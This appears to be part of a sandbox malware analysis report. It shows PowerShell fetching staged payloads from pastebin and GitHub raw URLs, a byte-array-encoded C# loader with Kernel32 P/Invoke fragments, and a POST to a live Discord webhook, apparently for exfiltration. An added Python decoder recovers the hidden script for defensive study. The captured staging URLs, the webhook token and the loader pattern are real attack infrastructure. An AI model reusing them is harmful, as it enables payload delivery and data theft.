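The `next_url` field is the practical caveat: after the 301 the client retries over 443, so a network sensor without TLS inspection sees only the redirect, and the file content must be taken from the sandbox's decrypted session (or from endpoint telemetry such as PowerShell script block logging) rather than from the port-80 exchange.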


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.3 | 62867 | 104.20.3.235 | 80 | 7688 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:55:01.595312119 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
Host: pastebin.com
Connection: Keep-Alive
Oct 15, 2024 15:55:02.453439951 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:55:02 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 15 Oct 2024 14:55:02 GMT
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
CF-RAY: 8d304df24f62e76e-DFW
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Oct 15, 2024 15:55:02.453788996 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:55:02 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 15 Oct 2024 14:55:02 GMT
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
CF-RAY: 8d304df24f62e76e-DFW
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.3 | 62869 | 185.199.110.133 | 80 | 7688 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:55:03.468152046 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 15:55:04.058543921 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:55:03 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120059-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000504.994470,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 14:00:03 GMT
Vary: Authorization,Accept-Encoding
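
The next session (PID 7900, the 32-bit SysWOW64 PowerShell, port 443 decrypted by the sandbox) is the one that actually receives a body: cr_asm_menu.txt, 25709 bytes of text/plain, whose first chunk begins `$bytes = @(0x24, 0x00, 0x53, 0x00, 0x6F, 0x00, ...`. Every second element is 0x00, which is what ASCII text looks like when stored as UTF-16LE code units; later chunks in the same capture show fragments such as `DllImport(Kernel32Lib`, `GetProcAddress(string` and `hModule == IntPtr.Zero`, i.e. P/Invoke declarations. The decoder below is an added example, not code from the report or from the sample's author: it pulls the array literal out of such a script and decodes it. The fragment it runs on is copied from the report's first captured chunk and cut where the report's ASCII view cuts it; padding the dangling final byte with 0x00 is an assumption that holds for ASCII source text. The decoded prefix `$Source = @"` followed by `using ` is the here-string shape in which C# source is handed to Add-Type, which agrees with the report's "Compiles C# or VB.Net code" signature; the `looks_like_inline_csharp` check is a heuristic, not a parser.

```python
"""Recover a script hidden in a PowerShell byte-array literal such as
$bytes = @(0x24, 0x00, 0x53, 0x00, ...).

Added example; not code from the Joe Sandbox report or from the sample.
"""
import re
from typing import Tuple

# One array element: hex (0x24) or decimal (36). Only complete tokens match,
# so a fragment cut mid-token ("0x") still parses cleanly.
TOKEN = re.compile(r"0x([0-9A-Fa-f]{1,2})\b|\b(\d{1,3})\b")
ARRAY_START = re.compile(r"\$(\w+)\s*=\s*@\(")
# `$Var = @"` followed by a `using` directive: C# source destined for Add-Type.
INLINE_CSHARP = re.compile(r'^\$\w+\s*=\s*@"\s*using\s')

# Constructed from the report's first captured chunk of cr_asm_menu.txt,
# cut where the report's ASCII view cuts it (after 0x79).
CAPTURED_FRAGMENT = (
    "$bytes = @(0x24, 0x00, 0x53, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x72, 0x00, "
    "0x63, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x40, 0x00, "
    "0x22, 0x00, 0x0A, 0x00, 0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6E, 0x00, "
    "0x67, 0x00, 0x20, 0x00, 0x53, 0x00, 0x79"
)


def extract_byte_array(script: str) -> Tuple[str, bytes]:
    """Return (variable name, bytes) of the first `$var = @( ... )` literal."""
    m = ARRAY_START.search(script)
    if not m:
        raise ValueError("no PowerShell array literal found")
    body = script[m.end():]
    close = body.find(")")
    if close != -1:
        body = body[:close]            # absent when the capture is truncated
    values = [int(h, 16) if h else int(d) for h, d in TOKEN.findall(body)]
    if any(v > 255 for v in values):
        raise ValueError("array element out of byte range")
    return m.group(1), bytes(values)


def guess_encoding(data: bytes) -> str:
    """ASCII text stored as UTF-16LE has 0x00 in every odd position."""
    if len(data) >= 4 and data[1] == 0 and data[3] == 0:
        return "utf-16-le"
    return "utf-8"


def decode_embedded_script(script: str) -> Tuple[str, str]:
    """Decode the array literal in `script` back to the text it carries."""
    name, data = extract_byte_array(script)
    enc = guess_encoding(data)
    if enc == "utf-16-le" and len(data) % 2:
        # The capture ended between the two bytes of a code unit. Assume the
        # missing high byte is 0x00, which holds for ASCII source text.
        data += b"\x00"
    return name, data.decode(enc, errors="replace")


def looks_like_inline_csharp(text: str) -> bool:
    """Heuristic: the decoded text opens a here-string of C# source (Add-Type pattern)."""
    return INLINE_CSHARP.match(text) is not None


if __name__ == "__main__":
    var, text = decode_embedded_script(CAPTURED_FRAGMENT)
    print(f"${var} decodes ({len(text)} chars) to: {text!r}")
    print("inline C# source:", looks_like_inline_csharp(text))
```

Run against the full 25709-byte body from the sandbox's saved PCAP or dropped file rather than this fragment, the same routine yields the complete embedded script; the encoding guess is worth keeping because the same loader pattern is also seen with plain ASCII byte arrays, which the decimal branch of `TOKEN` handles.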


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.3 | 49710 | 185.199.111.133 | 443 | 7900 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:54:11 UTC | 228 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_menu.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-10-15 13:54:11 UTC | 900 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 25709
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "2749e85a66d302dd1b2de7bbbef139d24889d7fb591ff86f76222d3238ccbfa0"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: CA78:DAD32:A40E5F:B3C958:670E7401
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:54:11 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120028-DFW
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1729000451.481151,VS0,VE32
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: f5f5b1626e924c074f9559bb76f255e67037f958
Expires: Tue, 15 Oct 2024 13:59:11 GMT
Source-Age: 0
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 24 62 79 74 65 73 20 3d 20 40 28 30 78 32 34 2c 20 30 78 30 30 2c 20 30 78 35 33 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 30 2c 20 30 78 30 30 2c 20 30 78 32 32 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 35 33 2c 20 30 78 30 30 2c 20 30 78 37 39
                                                                                                Data Ascii: $bytes = @(0x24, 0x00, 0x53, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x72, 0x00, 0x63, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x40, 0x00, 0x22, 0x00, 0x0A, 0x00, 0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x53, 0x00, 0x79
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 36 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 39 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 46 2c 20 30 78 30 30 2c 20 30 78
                                                                                                Data Ascii: 0x73, 0x00, 0x73, 0x00, 0x20, 0x00, 0x66, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x20, 0x00, 0x63, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x72, 0x00, 0x69, 0x00, 0x74, 0x00, 0x79, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x2F, 0x00, 0x
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20
                                                                                                Data Ascii: 0, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x20, 0x00, 0x64, 0x00, 0x65, 0x00, 0x63, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x72, 0x00, 0x61, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00,
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 45 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 36 44 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 39 2c 20 30 78 30 30 2c 20 30 78 33 42 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30
                                                                                                Data Ascii: x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x4E, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x29, 0x00, 0x3B, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 20 30 78 30 30 2c 20 30 78 34 34 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 44 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 34 42 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 33 33 2c 20 30 78 30 30 2c 20 30 78 33 32 2c 20 30 78 30 30 2c 20 30 78 34 43 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 32 2c 20 30 78
                                                                                                Data Ascii: 0x00, 0x44, 0x00, 0x6C, 0x00, 0x6C, 0x00, 0x49, 0x00, 0x6D, 0x00, 0x70, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x74, 0x00, 0x28, 0x00, 0x4B, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x33, 0x00, 0x32, 0x00, 0x4C, 0x00, 0x69, 0x00, 0x62, 0x
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 45 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 37 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 43 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20
                                                                                                Data Ascii: E, 0x00, 0x65, 0x00, 0x77, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x74, 0x00, 0x65, 0x00, 0x63, 0x00, 0x74, 0x00, 0x2C, 0x00, 0x20, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x74, 0x00, 0x20, 0x00, 0x75, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x20, 0x00, 0x6C,
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 78 34 37 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 31 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30
                                                                                                Data Ascii: x47, 0x00, 0x65, 0x00, 0x74, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x41, 0x00, 0x64, 0x00, 0x64, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x28, 0x00, 0x73, 0x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 36 38 2c 20 30 78 30 30 2c 20 30 78 34 44 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 45 2c 20 30 78 30 30 2c 20 30 78 35 41 2c 20 30 78 30 30 2c 20 30 78
                                                                                                Data Ascii: 0x20, 0x00, 0x28, 0x00, 0x68, 0x00, 0x4D, 0x00, 0x6F, 0x00, 0x64, 0x00, 0x75, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x50, 0x00, 0x74, 0x00, 0x72, 0x00, 0x2E, 0x00, 0x5A, 0x00, 0x
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 31 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20
                                                                                                Data Ascii: 0, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x50, 0x00, 0x74, 0x00, 0x72, 0x00, 0x20, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x41, 0x00, 0x64, 0x00, 0x64, 0x00,
                                                                                                2024-10-15 13:54:11 UTC1378INData Raw: 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 38 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 35 2c 20 30 78 30 30 2c 20 30 78 37 38 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30
                                                                                                Data Ascii: x00, 0x20, 0x00, 0x20, 0x00, 0x74, 0x00, 0x68, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x20, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x77, 0x00, 0x20, 0x00, 0x45, 0x00, 0x78, 0x00, 0x63, 0x00, 0x65, 0x00, 0x70, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.3 | 49711 | 185.199.111.133 | 443 | 7676 | C:\Users\user\Desktop\Lm9IJ4r9oO.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-10-15 13:54:12 UTC132OUTGET /labail300/psapi/main/modmenu.txt HTTP/1.1
                                                                                                User-Agent: Downloader
                                                                                                Host: raw.githubusercontent.com
                                                                                                Cache-Control: no-cache
                                                                                                2024-10-15 13:54:12 UTC806INHTTP/1.1 404 Not Found
                                                                                                Connection: close
                                                                                                Content-Length: 14
                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-Frame-Options: deny
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                X-GitHub-Request-Id: 928E:1FAF94:22FD91A:26C82AF:670E7404
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:54:12 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdal2120091-DFW
                                                                                                X-Cache: MISS
                                                                                                X-Cache-Hits: 0
                                                                                                X-Timer: S1729000453.642054,VS0,VE151
                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                X-Fastly-Request-ID: 6b3c7bc31e0ff925eb9dd89267d80fb5f0da6f0f
                                                                                                Expires: Tue, 15 Oct 2024 13:59:12 GMT
                                                                                                Source-Age: 0
                                                                                                2024-10-15 13:54:12 UTC14INData Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                                                                                                Data Ascii: 404: Not Found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.3 | 62862 | 162.159.138.232 | 443 | 7900 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-10-15 13:54:51 UTC311OUTPOST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
                                                                                                Content-Type: application/json
                                                                                                Host: discord.com
                                                                                                Content-Length: 212
                                                                                                Connection: Keep-Alive
